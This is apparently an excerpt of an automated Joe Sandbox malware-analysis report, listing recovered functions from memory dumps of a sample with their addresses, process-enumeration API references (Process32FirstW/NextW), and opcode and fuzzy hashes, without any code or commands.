                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8797356b8515aab371083438692feabda840045f82f4c7a94e0ded111158d978
                                                        • Instruction ID: 797257bd4e829b8ae53e80a91758288a48f6ac5f637eb3cfbd8ca58217b2b20b
                                                        • Opcode Fuzzy Hash: 8797356b8515aab371083438692feabda840045f82f4c7a94e0ded111158d978
                                                        • Instruction Fuzzy Hash: 4F61B3EB56D321BDB14280852F14EFF5A6EE6D7730F31862AF82FC6646E2D40E891075
                                                        Function 070D027F Relevance: 1.8, APIs: 1, Instructions: 338COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 08c2c403d49c8e7287e78e146aecdb74107b8a225218f235d3f4b27a6080e8e5
                                                        • Instruction ID: 9e62a7c8043bc4ca0f8339e820757516140dda86f64d586654fa42e70a3e2bb7
                                                        • Opcode Fuzzy Hash: 08c2c403d49c8e7287e78e146aecdb74107b8a225218f235d3f4b27a6080e8e5
                                                        • Instruction Fuzzy Hash: 6761B2EB16D321BD714280852F14EFF5A6EE6D7730F30862AF82FD6642E2D40E891075
                                                        Function 070D02DA Relevance: 1.8, APIs: 1, Instructions: 338COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb0619df00d575c0c7fa2756c7a8025fea2913d46dd7b988578eae3956f4c51e
                                                        • Instruction ID: 78fb0abb56301d660c02fc210bec8ac3890455c43aef5545a515869dea05c670
                                                        • Opcode Fuzzy Hash: bb0619df00d575c0c7fa2756c7a8025fea2913d46dd7b988578eae3956f4c51e
                                                        • Instruction Fuzzy Hash: 8761D6EB56D321BDB14281852F14AFF5B6EE6D7730F30866AF82BD6542E2D40F8A1071
                                                        Function 070D0345 Relevance: 1.8, APIs: 1, Instructions: 334COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc260f5b87bb87dd64a1e1f80b0bc378a846a1d616dad1acc7c3d3a20a9319f3
                                                        • Instruction ID: 2f7e3ea50b6b293e751ab5499caa04c5df44822a886fb92af134036ca0e42521
                                                        • Opcode Fuzzy Hash: cc260f5b87bb87dd64a1e1f80b0bc378a846a1d616dad1acc7c3d3a20a9319f3
                                                        • Instruction Fuzzy Hash: 5361D3EB66D321BDB14294852F14EFF5A6EE5D7730F31862AF82FC6642E2D40E891071
                                                        Function 070D0322 Relevance: 1.8, APIs: 1, Instructions: 332COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c4e64e00fdf9516fad31832cf84735854a8d199adb14922cb31416ad47804e7
                                                        • Instruction ID: e1512056b7df53032a06572953ca252e723eadff35e38b9987f6226c55e12434
                                                        • Opcode Fuzzy Hash: 5c4e64e00fdf9516fad31832cf84735854a8d199adb14922cb31416ad47804e7
                                                        • Instruction Fuzzy Hash: 5451A1EB26D321BD714290852F14AFF5A6EE6D7730F30872AF82FD6642E2D40E891075
                                                        Function 070D02BD Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: fa460dccb2294370c2249a5d54c5d5c73a5769d2f32f5e487d4270970ffe2d9f
                                                        • Instruction ID: 66a1115e99f8c3add6daae730c682fd3eeb51d21812a0bcc02c70d4979900cf1
                                                        • Opcode Fuzzy Hash: fa460dccb2294370c2249a5d54c5d5c73a5769d2f32f5e487d4270970ffe2d9f
                                                        • Instruction Fuzzy Hash: A551B1EB26C321BD714290852F14AFF5A6EE6D7730F30862AF82FD6642E2D40E891071
                                                        Function 0707039B Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MWr1
                                                        • API String ID: 0-1830714503
                                                        • Opcode ID: ee06985a17658149049debe6a5ecebaf6ef6a006a3f0946fc0c334afdfe4d528
                                                        • Instruction ID: 2189de38360e605865aa072bafece3db4df86c51809829f2cdfc379ce6e89063
                                                        • Opcode Fuzzy Hash: ee06985a17658149049debe6a5ecebaf6ef6a006a3f0946fc0c334afdfe4d528
                                                        • Instruction Fuzzy Hash: 66C1ADEB96C115BDB2428181AB54BFF676EE3C7730F308726F823D5602E2980A499539
                                                        Function 070D030B Relevance: 1.8, APIs: 1, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: c78cb1a35a4ddb0f200832983b458f063e4ab04fe2d564ffbf712b1dd8fce260
                                                        • Instruction ID: ab37b75ec3542d2348800873dcdc780725f00efb3d9cec44bf32a728426390c0
                                                        • Opcode Fuzzy Hash: c78cb1a35a4ddb0f200832983b458f063e4ab04fe2d564ffbf712b1dd8fce260
                                                        • Instruction Fuzzy Hash: 8551B3EB26C321BD714290852F14EFF5A6EE5D7730F31862AF82FD6642E2D40E8A1071
                                                        Function 070E0136 Relevance: 1.8, APIs: 1, Instructions: 292COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe4a8de69cb267f059b170c2567ce22177207d29a0ef70081edccb9f75d6a352
                                                        • Instruction ID: f72d8e96a03719a94df8985a5d6b87f2fcef67ae2d3645ce8863f12cc066ec6a
                                                        • Opcode Fuzzy Hash: fe4a8de69cb267f059b170c2567ce22177207d29a0ef70081edccb9f75d6a352
                                                        • Instruction Fuzzy Hash: DB51C3FB15D111BDB15281816B54AFF676EE6C3730B30862BF817D6642E2D90E4D5132
                                                        Function 070D0374 Relevance: 1.8, APIs: 1, Instructions: 291COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: a2245efd0059f672789bab69ff624ea3ded562dee1d29b4fcabde3d4c023fc3e
                                                        • Instruction ID: bd6544e9e5c01023de5efe3f8a924fb2f414e3ba473ce49bd7c34bb212f7832b
                                                        • Opcode Fuzzy Hash: a2245efd0059f672789bab69ff624ea3ded562dee1d29b4fcabde3d4c023fc3e
                                                        • Instruction Fuzzy Hash: 4C51B4EB26D321BD714290852F14EFF5A6EE6D7730F30862AF82BD6546E3D40E891071
                                                        Function 070D038C Relevance: 1.8, APIs: 1, Instructions: 289COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: a36f379275ca46e44a8dd76aef08b2f69e306da6e28920755373f0b1a5a6c80c
                                                        • Instruction ID: 67d9254554fdb95e6e6bb1dd31fabdbe94e7cccf075b7eeb6c85d85fb7c45943
                                                        • Opcode Fuzzy Hash: a36f379275ca46e44a8dd76aef08b2f69e306da6e28920755373f0b1a5a6c80c
                                                        • Instruction Fuzzy Hash: 5C51A2EB26D322BD714290852F54EFF566EE6D7730F30862AF82BD6546E3D40E891071
                                                        Function 070D039F Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: b102301ed35cded482592d97829d8ecf0f68ac95470a9b52b66896b41dbfa7da
                                                        • Instruction ID: 362dd1db5487426ded40cccd208fbc9059619a19537f99ffc410c6586042b4e5
                                                        • Opcode Fuzzy Hash: b102301ed35cded482592d97829d8ecf0f68ac95470a9b52b66896b41dbfa7da
                                                        • Instruction Fuzzy Hash: 125190EB26D322BD714290852F14EFF5A6EE5D7730F30C62AF82BD6546E2D40E8A1075
                                                        Function 070D0452 Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 6aadbcf2ed8bb2126f4dacdb0f3d5bd962c7a6263301e0705ff208053b73e6a5
                                                        • Instruction ID: b1975a0b9ffbce3ef8da6c438f1435bff367b132e5320efccc66c4bdb4c702aa
                                                        • Opcode Fuzzy Hash: 6aadbcf2ed8bb2126f4dacdb0f3d5bd962c7a6263301e0705ff208053b73e6a5
                                                        • Instruction Fuzzy Hash: 5851A0EB26D322BD714290852F54EFF6A5EE5D3730F31862AF82BC6546E2D44E8A1071
                                                        Function 070D03C1 Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 1a3a81f2d9d41a254d22cf57d3ed0a36230fa584e3a2c7fb1fba819ef09f1270
                                                        • Instruction ID: fab1ca09a33524901457b4d83df76b44d6e13c975d8aea29dbed0fea32d06486
                                                        • Opcode Fuzzy Hash: 1a3a81f2d9d41a254d22cf57d3ed0a36230fa584e3a2c7fb1fba819ef09f1270
                                                        • Instruction Fuzzy Hash: F951A0EB26D322BD714290852F14EFF5A6EE5D7730F30862AF82BC6946E2D40E891075
                                                        Function 070D03CA Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 95f6cd76f257041de292992dea941074875dc052402cd12f2b58e1cadc916cbc
                                                        • Instruction ID: aedc84c895502de61e7f120e253b53915fed1749986bdd685d3a7707e9c4c257
                                                        • Opcode Fuzzy Hash: 95f6cd76f257041de292992dea941074875dc052402cd12f2b58e1cadc916cbc
                                                        • Instruction Fuzzy Hash: DE5191EB26C322BD714290852F14EFF5A6EE5D7730F31C62AF82BC6546E2D40E8A1075
                                                        Function 070D03ED Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 8d9c333840341d5c9491fe8c2a281398a1c7bf17fe7469ebd7a0ce5687142a06
                                                        • Instruction ID: ebdae68450fe1f52e588700050c7735b0f5421918234ce7fef50ae0ce6232b74
                                                        • Opcode Fuzzy Hash: 8d9c333840341d5c9491fe8c2a281398a1c7bf17fe7469ebd7a0ce5687142a06
                                                        • Instruction Fuzzy Hash: D5418FEB26D322BD714290852F14EFF566EE5D7730F31C62AF82BC6946E2D40E8A1075
                                                        Function 070E01E8 Relevance: 1.8, APIs: 1, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d7fadf3c089a3c9be226edcdec3747ddcf8c46279e3804b7b80c1c392af5891
                                                        • Instruction ID: ab3f726da5d2f18af912a0a7aed7ee41f2144a9269c8c589576dcd37d3c0adcb
                                                        • Opcode Fuzzy Hash: 2d7fadf3c089a3c9be226edcdec3747ddcf8c46279e3804b7b80c1c392af5891
                                                        • Instruction Fuzzy Hash: 2A419DFB16D111BDB14291916F64AFFA7AEE2D3730B30862BF827D6542E2D80E4D5132
                                                        Function 070E0208 Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 5bfc148b0d3dc3cfc3b1026b9b30045c7d166b13b2d14fb0324fdb92ba135535
                                                        • Instruction ID: a0c6b42a300fa23707e9dc6f02a48cf7d4d54c43f6175f05bbb98ce43b431dc8
                                                        • Opcode Fuzzy Hash: 5bfc148b0d3dc3cfc3b1026b9b30045c7d166b13b2d14fb0324fdb92ba135535
                                                        • Instruction Fuzzy Hash: A441C1FB15D2217DB24281916F54AFFAB6EE6C3730B30862BF817D6542E2D80E4D5132
                                                        Function 070E0201 Relevance: 1.7, APIs: 1, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 328ed4f99080b561b74ae890d1de3bd688b230ea122e4397ba102713721d58fd
                                                        • Instruction ID: e99672b0c02d5b25ed58e0ca241738d6c48ed1dfbd7ac409b5efe125dd30fbb1
                                                        • Opcode Fuzzy Hash: 328ed4f99080b561b74ae890d1de3bd688b230ea122e4397ba102713721d58fd
                                                        • Instruction Fuzzy Hash: 7F419EFB16D111BDB14281916F64AFF67AEE2C3730B30862BF827D6542E2D80E4D5132
                                                        Function 070E029A Relevance: 1.7, APIs: 1, Instructions: 239COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11cfd82184a1a20da7f5ca19d87849f749c430cd7511f60214c04c4b7c6caaeb
                                                        • Instruction ID: f8318d43018def01c560e4a0cc5f42840a2cb5b33f005dbae762b5c62d654d1a
                                                        • Opcode Fuzzy Hash: 11cfd82184a1a20da7f5ca19d87849f749c430cd7511f60214c04c4b7c6caaeb
                                                        • Instruction Fuzzy Hash: C8419BFB15D111BDB14281926F64AFF6B6EE5C3730B30C62AF857D6542E2C80E4E5132
                                                        Function 070D041D Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 8f8a5a41c48540d20a22c2065881b6c85c4061801d6267db29e186c65fede034
                                                        • Instruction ID: 576f4cdc954ac7a155e64670db319b936c8cd7013e2935fcd5cfaf58e4424f67
                                                        • Opcode Fuzzy Hash: 8f8a5a41c48540d20a22c2065881b6c85c4061801d6267db29e186c65fede034
                                                        • Instruction Fuzzy Hash: 674190EB26D322BD714280852F14EFF6B6EE5D7730F31862AF86BC6546E2C44E4A1075
                                                        Function 070D0488 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 8f00090d532a6901aa5850540126ce1b4c2ee4caf99347e036e722ad56d916fe
                                                        • Instruction ID: 5b64443cdbdae61f54b2a09011e44768edab9b8fba73ffbdac7880ae8fb4d54e
                                                        • Opcode Fuzzy Hash: 8f00090d532a6901aa5850540126ce1b4c2ee4caf99347e036e722ad56d916fe
                                                        • Instruction Fuzzy Hash: 7E418FEB26D322BD714280852F14EFF5A6EE5D7730F31872AF82BC6546E2C44E8A1075
                                                        Function 070E0243 Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 8ee9a7330de44f7da5a46da95595fe13501ea9dde576c755123e9d8b40a9505d
                                                        • Instruction ID: bdd800cdfe391d6ec0619e397c271642e569f6c28b33bb77504c25e1692dc2aa
                                                        • Opcode Fuzzy Hash: 8ee9a7330de44f7da5a46da95595fe13501ea9dde576c755123e9d8b40a9505d
                                                        • Instruction Fuzzy Hash: E6418EFB15D1117DB25281926F64AFF6B6EE1C3730B30862BF867D6542E2C90E4E5132
                                                        Function 070E025F Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 8d85e5311e5506aa000ffc11e80783b1a5576712dfb22cf000e7346fb56fe174
                                                        • Instruction ID: 04f22dc1c3e344600edcff235ecd5866d035a75264e6e3131d5197d3ba82668f
                                                        • Opcode Fuzzy Hash: 8d85e5311e5506aa000ffc11e80783b1a5576712dfb22cf000e7346fb56fe174
                                                        • Instruction Fuzzy Hash: 93418AFB15D111BDB14291926F68AFF6B6EE1D3730B30C62AF817D6542E2C80E4E5132
                                                        Function 070D043D Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 779b29e4592d8d806f704dd9f8cdd395a1311e4ca94404a74e0107acf68c8ed4
                                                        • Instruction ID: f57f572459a3399f5d0734c121a3f07067ce340801b8ee9074eaf1907308df83
                                                        • Opcode Fuzzy Hash: 779b29e4592d8d806f704dd9f8cdd395a1311e4ca94404a74e0107acf68c8ed4
                                                        • Instruction Fuzzy Hash: 634170EB26D322BD714290852F14EFF566EE5D7730F31C626F82BCA546E2C44E8A1075
                                                        Function 070E027F Relevance: 1.7, APIs: 1, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 8114135a22e2242da7e6917883a286a625f79727eb99c7b9a8fb532a08907f4b
                                                        • Instruction ID: ad7f69e0d153f614d0bdb3e0073bb5ddf1b4f4850570bdbcf4c14f47955ac9ba
                                                        • Opcode Fuzzy Hash: 8114135a22e2242da7e6917883a286a625f79727eb99c7b9a8fb532a08907f4b
                                                        • Instruction Fuzzy Hash: A2419DFB15D110BDB14291926F64AFFAB6EE2D3730B30C62AF853D6542E2D80E4E5132
                                                        Function 070D0471 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: e814a66ea175ea5ed110638e893cb857e19934d2f70b1b634fc68b4f9ae72cbb
                                                        • Instruction ID: 2d6c2adcb070baf899068562e6fd8762a8bed302aeb401cb05e90dcdf09007f2
                                                        • Opcode Fuzzy Hash: e814a66ea175ea5ed110638e893cb857e19934d2f70b1b634fc68b4f9ae72cbb
                                                        • Instruction Fuzzy Hash: 2E419EEB26D322BD714290852F14AFF6A6DE5D7730F30C726F82BD6586E2D40E8A1075
                                                        Function 070D04AD Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 38fba55ca587fa95d892eb17770e3897ac163b039855f2dc106f60e38d80fefa
                                                        • Instruction ID: 91d96fe932327783360ff13ffcac0505878b8e855cb818a145b466678d331457
                                                        • Opcode Fuzzy Hash: 38fba55ca587fa95d892eb17770e3897ac163b039855f2dc106f60e38d80fefa
                                                        • Instruction Fuzzy Hash: CE415DEB26D322BC7142D0852F14EFF6A6DE5D7730F318626F82BD6546E2C40E8A1075
                                                        Function 070E02DB Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: c2e8731a2a45e67e9689497bcbb029f02c7844beac9d5f9401180c463715ca28
                                                        • Instruction ID: 6f990e3c79b2eb2be14f91431c75b75b2852cda6b5af07a72063613d67039819
                                                        • Opcode Fuzzy Hash: c2e8731a2a45e67e9689497bcbb029f02c7844beac9d5f9401180c463715ca28
                                                        • Instruction Fuzzy Hash: 64415CFB15D111BDB14281926B64AFFAB6EE2D3730B30C62BF817D6546E2C80A4E5132
                                                        Function 070E02B6 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
